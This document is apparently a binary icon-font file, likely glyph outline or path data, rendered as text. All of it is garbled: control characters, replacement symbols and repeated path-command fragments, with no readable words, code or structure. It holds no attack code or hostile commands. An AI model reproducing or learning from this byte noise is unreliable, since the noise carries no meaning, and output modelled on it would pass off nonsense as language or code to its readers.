�.BB.�.B>,!1�pp-:]	)����-2#!"&546;462&"2646/&'&7P��P&4&6a			j.			R	���`&&�	j/	T����%-5AMY2#!"&546;462264&"6264&"6264&"6"26454+";2=4+";2=4+";2P��P&4&��h���������`&&��RR���hh����3;CK[$"&462&"&462'&67676563267'&'#5&$"264&"264&"&4622#!"&=463�			�H44H4��7VJ<E /

27�81
7n�			�		��		�			G4H44H�	
 #
	[[n			�	 		 	������<AGM>7.'&6;2!676;23&'67+"'&'!+"&67#7!36!&'# B--B 
 8 

*M1,"
 *9
 �� 
�$����	��
�./DIID/

(?9@$Z8		h����B�5=%'&>?7'76&'.'&7#"&=46;276264&"&5>!=!=<���D-+,\Y		pd-���((��cc�5)G,8,7#	 	��$G�((����B7"&546;7532#2+"&547#"&547#"&5#"&=46;2�		�00�		 		S(�(S	0		`	�		�  �	�	@	 				p	 		������6#532;#!"&546;4+54+"#";;2=325y�
7
�
��

�@808808W
��
��

�
��88088����/8;#!"&=32?3264&+'&"'&+"=4;546;#532 
�
��
F#
9Z		F#
9�8
ș�
8
��

�Fr,		Fr(�
i
���@�	
)346;#"&5!%;;2=32=4+54+"#"%2+00�@�808808P0p�@0��@�088088������@�%1=Ieq}2#!"&546;546;254+";2=4+";254+";2=4+";2754+54+"#";;2=3254+";2=4+";2 
	��	
�
�
�((((�((((�((((`
��		p
@

@��((�((t((�((���((�((���#2"&454+"#54+";2=3;2�Ԗ�Ԗp0`00`0��Ԗ����XX�XX��@�.82#!"&546;35"26426'.+"'#"3#546;2� ��F4&&4&
"*
��
@
���```�&4&&4�


�``
����9E2#!"&546;462&"26454+54+"#";;2=32=4+";2P��P&4&6H808808�����`&&��088088�����8<@7"&=46;7532##32#!"&=46;5#"&=463!25#!5#�		p@@p		�00		��		00		`		������	�	�  �	�	�@	 		 	@	 		 	@@@@@��D�'2"&=454&"7.7>/&76B\BB\B�(��/vT"�S	#�/�B.�.BB.�.�pp�#	Sv/7Tv/�"����!15!#!"&=32=4+532=4+532=4#72#!"&=463 @
�
xxxxx�

��

@��

@@@�
0

0
����52#!"&=463!#!"&7;;2=32=4+54+"#"h

��

@
�
@808808�
0

0
� `��
�088088����#?G%2+"&=!+"&546;235463'"=4;276232+'"/"&462.B	 	�	 		 	�	��2f		z2L4&&4&�B.�		00		`		�	�(c		7		,c		7�&4&&4����IQY^%2+"&5#"&=32=4+"=4;2=4+"=4;2=4#!"=4;5463!232264&"264&"75'#p		08P8�8P8�������8,d�,((\((�d,`	 	(88((88(�00dlp((((�dp����#37NZ%2+"=43+"=4&'&=4;22#!"&=4635#+"=4'&=4;22+"=43x0).0$0p		��`�0$<0X0`��	W1&B%>>��	�	@p@@B9!,*AB>,��������>7//&?'&??6/7?6'7//&?67'&?6�@��&@BC87-8�-I"�"9-A��CB@&87.8�-J"�"8-������$.2#!"&562#".'463/&76.76dx[	��	/	[<7*T	#�/F�/vT	#M::c:M$1kTv/�#F�#	Tv/�����(#"&4?57?6/7?6/7?6/7>�#�dYY-22-22-23.M�!R�YYe.32.32.32.������/#"'&6?'&?67'�"�+/�"FO�"�$ R�"�EO�����';?"=4;2+"&=3352#!"&=463"=4;2+"&=335H�/B/0@�		��		X�/B/0@�00�!//!�``��	 		 	�00�!//!�``����#A%2#!"=432#!"=43%2#!"5743%+"=4&#!"+"547%62���p��p���P��P`00`00�00� ���

�W q���!22#!"&546;2654'"&462'"2654'76.�&&��&&q�qd�^^�^�""�&��&&@&-3OqqO3-�^�^^�:O����3}62"&4"&4622#!"&=4632#!"&=46;!'54+532=4+54+"#";#";#";#"26=3264&+532=4+532�			�			�		��		`		��		0`�hhhh��hh@(@(@hh�@						�	 		 	�@	 		 	`���    ((  ������"-%2?/.=32?7/76!6/.7��
��
�@@��\����\��'�66�'kkp8� 

 �8�����$,2#"'#"&'&>7&54264&"264&"264&"�Ԗ�j83AL9s���z�z319JVv������$747#"'#"&767&'&?6632@	E&(83AL,9:
��	

iI`j�9��
3
4+9�

�

	R5zVH:��974&+463!2#"!%2+"&=!+"&=&546;2!5463�& 8(@(8 &���& 	@	��	@	 & 
�
�&(88(&@`&$y				y$&
``
���Fh$"&462'+"&;26=>54&/&546;2?6&'&'54&+"2#!"&=46;#"3!2=4+67V�zz�z�"?
&
	
">
'

�

�@

 +?

l

@, z�zz��$!




$!



��
`

`
''�����	)1&'67673+#&'&6?&'&54762546264&" N5 
,pp ^BMA
k.�U}N/			;1%
E8K@�B^8H$Qh=7	
EX<!/`			��A�%%#!"&=46;76;2+";2?625���		7/ *�N		v]	x
	y	`	&		J��A�8%'&6767>"#!"&=46;76;2+";2?62m=<m���		7/ *�N		v]	�rHHrH
	y	`	&		J��A�En.'&67546;2'&+"+"&=&'&5474?6;254'#!"&=46;76;2+";2?62 

	$	6
 
	$	����		7/ *�
N		v]	0%			%		�

y	`	&
		J��A�1$"&54762#!"&=46;76;2+";2?62HP8SS����		7/ *�N		v]	�7',pp,'
	y	`	&		J����"E7+"'&/&=4622?6/&>$2+"&=4?>2?54�9	�i
Z
&�
i�	9&

Z�M"+p		�
�

�l
	3�
�
�		p+"M
3	
l�
������%@2+++&/&6?54?26=%54&+"&=4?6;76�


&�gPPA*<*,P!�"!gg
0
@
&<�.0$'z**8%.!X~	
<�����5++"&=47'#"&7>7#6;5#462#327#4'
	�		�
�	
.C)>t0pQ^Qp0t>?X
��		
��
$A,Dl��RnnR��lDT������en"&462"&462#"/?#"#.?6?'#&/&/"#"&/&?676546;2?676.7�((d((N)
C
	


+3�3+



C$
	�	
#��)`((((�pE.d L]
\1G
!!
G1\]L P 
'"
`		`
"'
 �.E
����@�CKZ%2++"&=#+"&=.5#"&7>32+";>;26;264&"'"4&54621&#0		1
	@	�	@	("
+X:�, 
i			�8P8�	�	
Q		00		Q'0&	7I"L@			�(88(������)?/.%'.4>?6762'67&"uO[D	�	E
�
,
"k
,"O4!Z!�Xf#	II@&W;���&.;C%2#!673264&+"&46;&5462#"3"2642.54264&"�(88(���

`(88(--8P80`

m�xP80 5S�8P8!8P8@ (88(P�8(P&V(H���2+"&="&5%3&'>@]�	 	]��@tU+)2;`�]�		��]@V�	=/*���#'2#!+"&5#"&=46;546;25!�		��	 	0		0	 	 @�	 	��		p	 	0		0��������"/<62"4&"276'.#"?62&276&"�Α��7�

%
&�-�-

#nYΑ�Α						o66*����!2"&42#!"&462&264&"�4&&4&�		�p]����C�P88P8&4&&4�	 	����]^B@8P88P������)17'&>?7'72&!#"&'/&7%46264&"21M>M2�LB.-A�w
Z�((H�\]�:~�p.B?-l.^D
�@((����)19?G%+"&547##"'#"&5463!232264&"264&"%3'&#264&"m	/B/�/!((!/
�
&��0\+�V	!//!!/  /!P

`��0+�������&/'&?632576%5#!"&z

���%	

N� n"��n
��

	�!

	=��K�
���
����%�2+"546;5.?4>;2��(4@�	@4uW7��7Wu������!'&?6>323!"&=46z
��	

�M2<T!�0���O


�

	i/=T<0&3�
7O����.6RZb7"&=46;>3232+"&'7;26=4&+"/?+54&+"#"&=46722"&4&2#54@		P0.%			P`P8(0(8�H$$$$�3EP
�
PE30p			W	 �	`	+5$	`	+55+X(88(Y$$$�L3
@

@
3L`					00����+$"&4622#!"&=46;27%/&?676jKKjK&7O��O7#L#T	�	Q			-i	�KjKKjkO7**7O��	R			-h	����+3$2"&454+54+";2'!"&=46;2732&"&462�xTTxT�
&


<
�(#��O7#L#
+jKKjK�TxTTxB
6

L
,L*7O&HKjKKj����;CKv%/'&=&''&'&?&7'&767667547676264&"&"&462#!"&=46;2732332?b
!!

!!
�((�jKKjKI��O7#L#


	K    0((tKjKKj��
*7O

'����$/$"&4622!"&=46;277&7%'?62jKKjK&;)N��O7#L#>�G�=*H%�KjKKjk.M=
*7O��G��*H&����#76"&4622#!"&=46;27$"&4622+46=4'6;27�\BB\B#0C��C0	!F!P88P80.B�(*�B\BB\bC00C 8P88PXB.'9+����:%#!"&=467&4?6"&547'+"&?&5475?6K��K6_���`KjKB*M6

6M_P..5KK55
>	>
;����4<D$"&462!"&=46;32730%2+"&=46;5462264&"754&"jKKjK 	��O7#&&# 

�

 /B/]@�KjKKj��*7O
�

�
P!//!P�}P

P����+%2+"&=463"&4622#!"&=46;27p		�		�jKKjK&7O��O7#L#�	 		 	0KjKKjkO7**7O����%-%#!"&=467'47&52>32#"&'7"34&#E4G��G4e�++1#5KK5,Cg
�
�L4**4Lf�33(KjK5)`

����7%'.54?6>7'&"&462#!"&=46;273230n$"5Ps!;`�jKKjK 7,	
��O7#L#�$@/&sN-�N:&KjKKjsDm#*7O������!'&?6>324>7!"&5z
��	

�#8!5K0&��3��


�

	r 6K5)B
� 9%�����+@%"/&=46;22>4.#"'".54632#!"&=46;2732w	
\		[O\
�#;"K5#;"KK:��O7#L#S		]		[O
E
X";#5K";#5Ko(:*7O����$"&462#!"&=4677'3jKKjK 5K��K50  `  �KjKKjlN5**5N��88�����;CKb��%/'&=&''&'&?&7'&767667547676264&"$"&462"&5462"'&#""#"&=46;323630#3273'#"&=46;2b
!!

!!
�((��4&&4&�.BA]B	

f�D/	!##
�(B
&@k    0((t&4&&4FB..BB."�


0C '	�:#
 &������*BE[^!2+"&5&'&/&6?&5463276%#"&505467>762'3'1"&50546767623'		�	�
�/!.v
�  ";#5K


<
SȐH��
KjK

<f�H	 		W0+!/(',!�ِ%/!<�
�j(59	!//!<4&��������+>AWZ46;&/.?>632/+"&5'054676762"&73'0546767621"&73'`	� �
v.!/�
�	�	`

<
SKjK8�H

<

KjK8�H	'!,'(/!+0��		�	96(�!//1���	95(&4<!//1����;?%2#!"&=463264&"";#";#";!'#"&=463!3'#�%
��
%sH���ri�	g��QQF@% 

 %`�@@@`�@����@�"6#.5476'&'"&546
�OM{O�
����'	l	//	��	'R	����$9Kil"'&476;2#'+"'&476;2%+".7>&'&>;22+"&764'&63&/#/.7&54>23'�"		_		#
#		#		#y"		R�1�1�"p`06
,
�4]+	9|9	9|9	)[6@6
,
d��
vv
:�t����)%/6?6&67>3%'7>76W
�65_<Q�	�";V"�
�m)$*
 pJ�
	�+m6+�	����
!#463!2#2#!"&=463!53`@�@P		��		����x��`��	 		 	@@������472+"&54632276&"&4622+&'3533!&#5463�/A�A/(P88P8P�	L�@��!`B//B 8P88P��&@@ 2.����-6?%#54&"#54?5#"&=46;546;232+4?#"&5%+5�`%6%`p0		0	 	0		0��mp	m	p�	�`%%`�	D3	 	0		0	 	3�/�	�d	����	(085 7"&5"&46232>7"&5%567$2"&4&'67==q�q��qq�q�h:&H>q�q�?!#���pp�p�0n37++++&&@&4&&4�4&&)?+	�/B//B	"%+����2"&44635"264&"62"&4�Α�ΑX^BOq�P88P8S��Α��gB^ qO`8P88PH����)12/"#"+/#&54754632264&" (8`M=),'&,ayt/!'J�%PAepxhx=	%!/ H����;!2#!"&=4632#"'!'#"&4626?&5462?&54		�`		�(H��H(HR(RH	 		 	@(��(

+��+

����(08@HP2+"&=7>'264&"'"/&4?62264&"264&"6264&"6264&"264&"P��	
�(��(����.�1��(��(���rr�����'/72#!"&5463264&"6264&"264&"264&"6264&"�%%��%%3ss�%��%%@%���ss�����'/2#!"&5463264&"6264&"264&"6264&"�%%��%%3��%��%%@%���������2#!"&5463264&"�%%��%%��%��%%@%�����'/7?2#!"&5463264&"6264&"6264&"264&"6264&"6264&"�%%��%%3��%��%%@%��MM�MM����'2#!"&5463264&"264&"264&"�%%��%%3ss�%��%%@%�ss����2#!"&5463264&"264&"�%%��%%3��%��%%@%������62"&46"&4622#!"&=463�6%%6%[6%%6%�

��

`%6%%6�%6%%6U
 

 
����!!2#!"&=46;463!2&264&"p		��		p m	 		 	��s�����"*!2+#5326!"&=46;467264&"p		�`p���		P
�	 	�@����!	 	m�0�P%2#!"&=463%2#!"&=463�

��

�

��

�
 

 
�
 

 
���"33&'"&476&&67>7>�'
!�b'�bGE:B�)!.,_Q�'g9,'1B�5t*"-,!����@�8@32+'6.'&"?632#!"&54>7>2264&"�:)�b6
	Zw	F#
 #& #O
	��&5HX0,:,S_#"Vi
	~,
	B0
	%1]L<%%%C���@D!2#!"&=463'.=4&+!46;23226=.='&4?625#P		��		�/!%��&�&$4&��	 		 	U� +,p`&&�4$ 

�>&�����@�CP]%+"&/#+"&=4?>/&6323632'&'&&/&6?67&#";26%5&#";26>C0%.B$B.%0C-
C$'));7J7;))'$C
��##%$%6$%##%�F/C=,'',=C/F�&%
	��	
%&��)

%%

)������%&/&6?'.?>n��	��
	�"	�	ff
	����(.?>&/&6?2#!"&=4637

.��

��

�p

T
xx
D�
0

0
������&,>%"/&6;235#"&=463!2+2#'3.#!"&=463!260
V� 	(+а		�		�]�
�}#4�!#��		F
@
s@l:@	 		 	@�]
�|4#��	 	 �`)2#"'#"&4632627&#"!2>54&#"�FccFQFFQFccFQFF�////!+L+///`^�^OO^�^OO�@@&
&@@����@�4@D%"#"/#"+"&=#"'+"&=.54>76;2264&#"5@
JLL				,4$0	TFCP
.Ew
	h��1	;		16		JY4)D&
0.=K	
�c	����%'%&=47%6m
	��3	�Z
	�"	�	f����&7&=47%6'2#!"&=4637.


��

D

�p

�xDD
B
0

0
�� $H!5>4&'5463!25#35#35#5!#54&"#54&"#54&"#54&"���
@
�`@�@�@�`�@		�		�		�		=	cc#

��������``







������5U'&?65462#";#";#36=46;22+"&=46;5.=7z	
��	
�8P8UUUUU),		L		�		8AW4
<)2


	�

	�-(88(   0		0*&�				"	iD)(9'"����&,4:@#"'&#"#"'&54632326322>7&.#6264&"575&'m	+1>�>?5
+1>�>?��$"%�B//B/` ���	
>=
>d=��$8P88PT:�1
#����&#"'&#"#"'&5463232632264&"m	+1>�>?5
+1>�>?��B//B/���	
>=
>��8P88P����	%1=G1!#!"&%;26=4&+";2=4+"%3!2=4#!";2=4+"2!5463�
��
�	`		`	pp��0����0	��	@��
� 		 		Xh@	00	����KWco2#!"&54632>54&/&546;2?6'&'54+"+"'&;25754+";2754+";2=4#!"3!2`

��

�	-	-	�pp�PP���
��

�
��	



 h����3%#32+/&?#"&=46;7#"&=463!7632�bK�

�S	

37

�K�

R


4
�`
 
j		
C
 
`
 
j		
C
 
�����%-56+".7>264&"6264&"6264&"264&"�P�U&P&(/hP)
n/3���=N&@";*P}CJm��m-S����"*2#!"&5463264&+";26=72+5����(88(`		 	0

0���`��8P8	�		0�@����"&462"&467"/&4762�%6%%6%�%%6%%F

��





%%%6%%�%6%%6%�

��





����$4%2+"&=4633#"'#"&=46;2%2+"&=463�

�

@��@$I`

�
�

�

�
�

�
  @0p �
�

�

�
����%1=I6/"/"/&54676276254+";2=4+";2=4+";2f&6
66
6&&6
66
6�������	
� 
	------	
�
	-----��hh������	"*.2:>H73#"&=46%#!"&54>;5462324&"2#37#364&"2#37+532   

&��&%pp!/��""@@`@@h""@@�
  
�
�
0��&&%@

@/�""X   �""X ��
�������7&/&6??6/7?6/7?6/7?6/7?6/76|�PE<
<87<<77<
;E���'ef/0ff/0ff'���#G7&546;2#";#";#"32#!"'73;2=3;2=3;2=��
`
88888x

�@�)@@�)��

 @@@
`
�888888@@@72#!"&=46;;2=3;2=3;2=3;2=3;2= 

�

0@@@@@
�

�
XXXXXXXXXX���/73+"&546;2#";#";#";#"�X
�

�
XXXXXXX @

�

@@@@����	/7A546;#"&52+"=4;27#54&+"#4?62264&"%2+
@P	h0��	`	��3B//B/p
	P�
��	@@(@
���		�u
k�/B//B
��	@���	#.'7562"/&47�@`>SS�>+u5�@�SS>�+>u5����!4"&46;46;#"%2'&/52>76#"'.#57676�%% �%  ,IfHM-4#-:+0�MH2N/80+:-#3 %6%���6%��2.&B

�	 B&, 	�
���*2:2+54+"#54+"#"&?6'.54264&"264&"�Ԗ*	N@N		,2�4&&4&�4&&4&��]"A6B8888B Z4]�&4&&4&&4&&4���	/J7546;#"&2"&427735654&#"32+'2+"'.#".'46;2`	`v	6Ԗ�Ԗ=2��$q| 3$qO=2|�		#,#�@	`	7�Ԗ���$2=Oq�  o2=Oq$|	@	���t�3#"'"'"'#"'.?63!22767#!".=327!5Z&/,XX-/&A	�				
�@					
�I(Z!!!!!!Z(h���
		�dd������
%%53#!"&53%#!"&?63!23+"&@@
�
@�
��U	�	%@	 	@��

��""����		���/"&=463!2#2#!"&=4632#!"&=463		�		@		�`		`		�`		@	@		@	P	@		@	�	@		@	�����7'7'772"&464/76/&'7?6/76/&'&'76/&'&'76/&'&?'&?'&??6/7??6/7??6/76/&'77'7�---�-------jԖ�Ԗ�.""--"!-.""--"!-�---�---D---�---q�Ԗ�Ԓ-"!-.""--"!-.""-3---���+/M%#54&+"#54&+"#54?6;546;232'5#53#!"&=3;26=3;26�	�	 	�	 	�	.	
3�3
	����
�@
�	 	�	 	�	
S				S
	.	PP		@@�`

`				������%/&#!"&=4&&/&6?267w9
9
�
99�?L?`
r		�

�		r
`��C�:I"&462/&/&/&/&?.?67>327"&4?6�((.		-
<"	#8	�(	;
	2
`((�E2Y


JB"<	 	*"�4
,"	<	
2	���$2#!"&5463!2#!"3264&"��s%%p	��		C@�%@%			�����$6O2"&42654':12764./&>'&"67627>'.3232654'�Α�Α�P
�b FbP
��Α��W


	�&&�

	��@�"2!2+"&=4&"+"&=46;!2#!"&=4630		�	8P8	�				��			 		�(88(�		 	`���	 		 		����	#:BJ%6?#&''#>#6&'37.'#!"&5463!2"2645!"3>-''-V
."'--'L
�

��)77)F�jKKjK ��
�1) )#*)1�1))*#�	4
	7)@)7&KjKKj��@������,x�7327/"&?#'&/32767672>367'&"&'.'&'.'&764'&7>76767676276&2654.#"a4%4	
.
	!
	4%4	
J
		
	

	

�7N7+'U
�&p
Y&�



	
	

	�P88(,����-2#!"/&4?63'76/&'&??6@%%���		�>>>>>>>>�%�%�

��>>>>>>>>����'7M]2+"&=463#>7##"&46322+"&=4632#"&'##&'6=3>2+"&=463p

`

@629*P
%% %

`

%% P*926U 

`

�
`

`
8H'?0O	
%6%�
`

`
%6%O0?'H��
`

`
����1;#"'&54675#"&=46;2+7'&?6/'!&/5#.�&4,		�		'	4	+�%%`@!,34Y�	 
	 
�'	4	+.53,!�''
������	#2!54635!+"&=#"&"264`
��
 �%@%6%@%��
��
��  %@%%@%M���4@HR\d2+++"&=#+"&="&=#"&=46;5462%;2=4+"264&"75#";26=4&+264&"�


 
�
 



�������=�p

�p

ps@
P
� 

  

 
�
P
0".."08��]�
`

`
�������[%#"##"'&'+"=#"'&767"#"'&4767.'4546320454>762>7632�		<I		%((%		I<		 ,+	"S!!	
!S"+-X	@@		!V#

)5p(
.0F!)
	#V!	�����'"/&4?62762'&?62762"����(o���p-
7�
-����(p��p-7�-�����@�-2+"546;5'&63!22#"'73264&#"#>(�8�n��<TT<(#$(88(,
4J}��}�TxT$	8P8+5�)!4675#"&=46;2+2#!"&=463 Rn�@nR		`		�		� 		=~TT~				��	 		 	���'/7%/&/&/&54?6?6264&"6264&"264&"�$&E'*M*7$&E'*M*7��3��*'E&$7+L
 E&$7+������&.6%/&/&/&54?6?63264&"6264&"264&"�#&E'*M*7$&E&*J5J��3��*&E&$7+L
 E&$4J5Jq�����1%2++"&5#5323#"&5#"&=46;546;2�

(
0
��
���
(

(
0
`
0
(

H`
�H��`

0
(
 �`'3?K[g2#!"&546354+";2';2=4+";2=4+";2=4+";2=4+"754&+";2654+";2`

��

���@@@(	�		�	��`
�


�H00		0		y����!)A2"&4>/7>.'&7264&"7'76.'&?>�Α�Α�
c4&&4&���Α��>
�&4&&4����@H%/67#"'".5'7&'&6?67&5462'0"0"132676&"264�767,RL\142G6G!	D8P84#03C#"9d
�h`:_~)= {:|"

v(88(Y$
Xt7/

����3N54&"54&"&'54&"&=4>3276322654.'#"/&54?&#"�QH4<<4H0>R-97n		�Vz'v		IVz8_F9�. f

wh

hw

f .�-

G
	�%
M
/&��@� *62"&=46/627.#"75&"26>54&'���8DF;<<"} @ &4&/&:!D8�K5�5KK5�5S,
&&

�

&&m&
,���!33#"&476&67>	-jQ�e:K? 9�2D[OV,�}n5119�."3W8.����)T];#!"&546;;2=4+";2=4+""'.'&"+";26?212?62;264&##532�
�
��

ȠPPPP�	+"		
/		I�
8
��

�
HH�	)6		2
			
�����'0;#!"&546;6&+54&+"#"27#532�
�
��

�LA	 	A`��
8
��

�
��P		P`R
���G�3#532&=#53546;#!"&546;;#"��
b�`@@��	�
��

�
��	F�b�`A@A|	�

�
�
�	���	373#"&=46%#532;#!"&=3?6/&#46;pp		��
7
�
��
�``�
Ƞ@	 	�
��
��

�A``A
����*6BR%#5%#532;#!"&546;;2=4+";2=4+"54+";254&+";265 ��
7
�
��

ȠPPPPPP	�		�	�@@�
��
��

�
HH���		`		����&2m#532;#!"&546;;2=4+";2=4+">54./&546;2?6'&'54+"+"'&;25y�
7
�
��

ȠPPPP�	-	-	W
��
��

�
HX��





����;CL;#!"&546;&'654&+";26=3??6/76/#5327#532�
�
��

�E!!%P			;�00		ɀ
b8
��

�
��!&%	�		0;7 		��b��A�7@EO7;#!"&546;;&'.'&"+";26??62#5327#%'762��
��

�
��	+"		��
b`�D�ED
(

�
�
/R	)6		2

(�b�D��D����'0;#!"&546;26/&";;26=7#532�
�
��

�A``A	 	��
8
��

�
��``P		P�
����&%"/&4?'&?67627'"/�		�Pu_VVR		[1�;;		;Q�		�uP_VVR		��0�;;		;R
��@�
"1%"&546?"/&4?'&?67627'"/@%6% 		�Pu_VVR		[1�;;		;Q�]#%%@		�uP_VVR		��0�;;		;R
�����
-A\n�62#"&76'47'.76'4&'".76'&6&'.76'&767'.76'.'".676#"&54'&676'&'.#&#0#"&=&762�+>		";I		
(�Lm

Q9		



'"&(X<9

GKl>60�
rn	ik
`<*MK	
GH  ML	
FI)<
#.><	
79?1:kJ
65
897O
z,
	'
V		<9R
fHJ*�� @`$2#"&'&?'&6>264&#"G0a@((@a0>p&X	
W&p�		`)7337)<*B
nn
B*<�	
����'/$2"&4&2"&462"&4264&"24+"36264&"N�Α�ΑP*<**<���<**<*�ΑΑ��)<**<*�  h*<**<����'2"&4264&"6'.#"7626264&"�Α�Α��	
=("
	14)��Α��*�	"
	������32+"546;5'&63!2!!��8�8��J��0����**0����j2"&446;.'+";2;2/&+";232?676?6?6=4&+"/&6?63232?65�Α�Α�	Y;		Z
	/
 	
	
	��Α��G	:R				 	
	
����_n2"&4654/&+.#"/&54?632;26/&54?6;2?6/&?6//2?676767654'�Α�ΑJ		
C	
	
G 	
	
_
��Α���
			


		G&
	
			 
	
/d/*����8m2"&4762;2=4/&4?&#"32?6;26=4/&?63254/&=4+"+"/&+";237632;2?6�Α�Α�	3Su>
		�'

	��Α��_N
	&
uS-			f



	
����!%)-15=DK2"&45#375#"6264&"5#75#5#75#5#75#6264&"5#326=4&+�Α�Α�(

 5000p000p000`(

��Α��(
8(
��((8((8((8((8((8((h�(%
(����&2"&4"264&"2642676&"'&�Α�ΑU�`Y
	/�/
��Α���6'	
'����#22"&4%2767&'&"2767&'&"2676&"'&�Α�Α8�+`Y
	/�/
��Α��!"		!"		!"		!"	��6'	
'����+92"&4$"?626'&'"?626'.2676&"'&�Α�Α[&#
&
	
�#
&
	
`Y
	/�/	
��Α��)))��6'		'����-AP"&5476227"&4632&"?626'&'"?626'.2676&"'&�(**0	�Α�gJ>/L&#
&
	
�#
&
	
`Y
	/�/
@77<03g��Α)!.)))��6'	
'����':2"&4?6&'&'&2676&"'&%>'.'.7�Α�ΑZFi`Y
	/�/	
	��Α��F

��6'		'�	
F����#12"&46/764.?64/&2676&"'&�Α�ΑP!!�!!PPX`Y
	/�/	
��Α��-0((	((00��6'		'�����/<JZ"&767622"&47667'676&&>'?6&/.?6.>'&26�*��)!)y�G!)y�G�	Z

4]Z

4�"k,<@PH)��H)
G�y) G�y) ([
4
�

Z`"a$,k���� .G2"&4?6/76&/&"2676&"'&%6&/&"?6/�Α�Α_#
F`Y
	/�/	
'#
#��Α��	##	  ��6'		'�	  	##������6FVd72"&476"'&'&61"&'?676&>32&'&&"?626'."?626'&2676&"'&f)S)
Hr s�s 
�_?lE
K&#
&
	
�&#
&
	
`Y
	/�/	
�H))GR9DD9R]:e=b)))�6'		'����%-K26=676&"'&.54264&"264&":#".=6362?>�ΑYH	*
	/�/	
*	HY��&

��gO~.$		$.~OgW�@%
?	����;HU%:#".=6362?>26=676&"'&.5464/&?'76&6%&

�ΑYH	*
	/�/	
*	HY�P!!�!!
	PPI@%
?	l�gO~.$		$.~OgA0((((00����%8@^2"&4&26=676&"'&.546'.#"?62264&":#".=6362?>N�ΑYH	*
	/�/	
*	HY�
%
&�4&&4&
&

��gO~.$		$.~OgP						0&4&&4�@%
?	����"1<62"4&"276'.#"?62&2676."�Α��7�
%
&�	
Y`Y
/�YΑ�Α						a	'66'
 �`/?O_72+"&=46;2+"&=46;2+"&=463%2+"&=46;2+"&=46;2+"&=463`

@

�

@

�

@

�

@

�

@

�

@

�
@

@

@

@

@

@
�
@

@

@

@

@

@
��@�/?O_2+"&=4632+"&=4632+"&=4632+"&=4632+"&=4632+"&=463`

@

@

@

@

@



@

@

@

@

@

�
@

@
�
@

@
�
@

@
@
@

@
�
@

@
�
@

@
���"@72+".=4>;2+"&=4632+"&=4&#"+"&=6�

�%

�Ҕ		zV8`8		�
�
@&@
�
�ip		pVz8`8p		pi���F7+"&=46;2#"&=46;22+"&46;23265454&"+"&=6�
%%
�

%%�Ҕ5%� fz�z		�p
%0%�
p
%0%`�i�%5(�VzzV		i��!�77/'7'&54%'76DC#)�#+3`3
����+ FC##�*
3`3+�+ǩ����';GS_ks&'&'&6;2+"'&'&'&6;2+"2#!"&=46;254+";2754+";2754+";2754+";2"&462�+
+
n+
+
�
%��%%+o�```��6%%6%($>($>($>($>@
�%%�%
S�pppppppp@%6%%6��@�-=M]ms��#32+54&+"#"&=46;#"&=463!2;26=4&+";26=4&+"';26=4&+"26=4&+"334&"%54&+";26=4&+";260		�	 	�				 		��&&&&�&&3&3�8P8&&&&���	 	P		P	 	�	 		 	-&&e&&[&&�&&�(88e&&e&&����7@L&=4;2+"=46#"'6+"=4.'&=4;22#"/2!2+"/�<0(0��$qY��Z�).00�vYuV

v*AB>,9!,��P8!W1/'
%>>����
p
�����-52"&4264&"4'654.'&7>264&"�Α�Α��##")��Α��W�

			�����5G2"&465."?624'654.'&7>765.#"?62�Α�Α�#&#	
&
h##")A#	
&
��Α��K))�

			�!)����&.Ma%/&>7676#"&462&#.&264&"4'654.'&7>?626'.#"�S
�/4g��ΑT��##
)
'	

.!	S	T�Α�g.,%#�

			�						
	����%2"&4"264&"2642676&#!"3�Α�ΑU�87Q
��
Q7��Α���H66H����.<2"&4?626'.#"?626'.#"6&#!";26�Α�Α

&
	
#�

&
	

��
Q77Q��Α��6)!!w6HH����#12"&46/764.?64/&6&#!";26�Α�ΑP!!�!!PP
��
Q77Q��Α��0((	((00�6HH����!/2"&4?626'.#"&"2646&#!";26�Α�Α
&	
%Z�
��
Q77Q��Α��5						
6HH����	ALP7"&=46;%+5322+"&547#"&547#"&5#"&=46;2#46;25#�

 @
  
0		S(�(S	0		`	`�`0`�
�
� 
�
�	 		p	 		�� �000��@�",2"'&547.=42767'5%6�hJrr�w�
,!�!/	��J4>��>4�0�?��(%�@�%(��8 ��@� *42"'&54264&"7.=42767'5%6�hJrrm""�w�
,!�!/	��J4>��>4^""I0�?��(%�@�%(��8 �����	?&76'7'/&?6276^K�KQr
�5��bWi!%�K�KQ
rs5K��bWh$�����	4'&6;2%2&'7632"&46&/&"?6/�?/o	
o
U
	o/?E
ʒgg�g
44&	//	=
+��+
s�g�gg�6
//
%4		4����2"&4264&"264&"�Α�Α����Α��W����!32"&42654'"&54724+"362654'"&547�Α�ΑX&4&""���4&""��Α��G&&&

�  p&&

&����*!2#!"&=463!6?654&+";26p		��		�MM0FF	 		 	[��;LL�&&���	+#76322++"&767.5#"&=463�d��				C6
�
6C		�c�$�	 	<a  a<	 	���0#!"&=463!22+2+"&=463546;265�
��

`
 %8(�

@

%�
@

`

 %@(8 
�

�
 %
	����	-9AF673&.'3'>76732#!"&5463264&+"36264&"7#&�-''-V.
'j

��%%		�		;jKKjK�-'1) )**h*#f)1
�@
%�%�`				`KjKKj�1)���?'73264&"'766'OTc!�]
];1#]$�b�!cT;]
]�'T(�b���!7'73264&"'6%'762���+	 ���
(�]�9�9(5+��!]�(
� J(9�9�����$67'&4?622?'762'&?%"/7?md		Z		">>,�.q.(-�q��k�		Z		d�,>>�d		Z		">>,.q.-(q��k		Z		e�,>>����.!2#!"&=4637&=46'46'%&'p		��		

'f0
A	db+
(&+��	 		 	�
e		C�	�1N
������1!2#!"&=4637'&6?627'&6?63276+"p		��		AM(Hh�A�c++.,���	 		 	kS$4b!R21'$�����*2%//&?'#+"&546;276%3264&#-NNNN�	 		�(80$TN��`

`NNNN�P			8($6TN�@����.6J254&""'54&".546'.#"?62264&"76'.#"?62�ΑA7		.d.		7A�

%
&9((�
%
&	��gBq!�		��		�!qBgG						�&4&&4�							����#.2"&4"2642654'&"6264&">'&#"32�Α�ΑU�(**3�-F7��Α���77��6 ����!)-59%+"&5#"&5#"&5463!235#264&"75#264&"'3'#u
 8P8�8P8 

��R``L((�`�((0�PB�
o
(88((88(
 
�`��((�``�((�`����=2##"'&7#"&?6&&/&?6>76327>o
)"(
C#+M�

b:

7:&
*KJ6
E=	 8=�	�'
	%#3hG6!'����'92"&4?626'.#"6&"'&276'.#"?62�Α�Αp

&
	
#�

#n#

-�3
#	
&
��Α��F)�**6�!)����(,048<@!2+"&=4>;53#!"&54>3!23'7#?#3'#73'3'#�		�	0��7		��7	���
�
�j�
`����
gFrj	 
	   ���		
